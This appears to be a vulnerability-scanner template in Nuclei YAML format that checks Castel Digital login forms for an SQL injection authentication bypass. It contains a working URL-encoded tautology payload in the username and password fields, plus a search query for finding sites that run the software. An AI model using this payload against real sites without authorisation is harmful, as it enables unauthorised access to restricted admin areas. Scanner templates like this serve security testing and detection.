Vulnerability Description
SQL Injection vulnerability in Castel Digital login forms.
id: castel-digital-sqli
info:
  name: Castel Digital - Authentication Bypass
  author: s4e-io
  severity: high
  description: |
    SQL Injection vulnerability in Castel Digital login forms.
  reference:
    - https://www.casteldigital.com.br/
    - https://cxsecurity.com/issue/WLB-2024050032
  metadata:
    verified: true
    max-request: 2
    google-query: "Castel Digital"
  tags: sqli,auth-bypass,castel,vuln
http:
  - raw:
      - |
        POST /restrito/login/sub/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=x%27%3D%27x%27or%27x&password=x%27%3D%27x%27or%27x
      - |
        GET /restrito/ HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "Banner"
          - "Construtoras"
        condition: and
      - type: status
        status:
          - 200
# digest: 4a0a00473045022100fa85f86545a05e57bb65a57fc4d43ac753f4f55473ef9617b61f61513a89985602204bf1dc1a025d1871062b02a0904bbb0db0f4ddfb7b792e1cd5b35921d2c7a28f:922c64590222798bb761d5b6d8e72950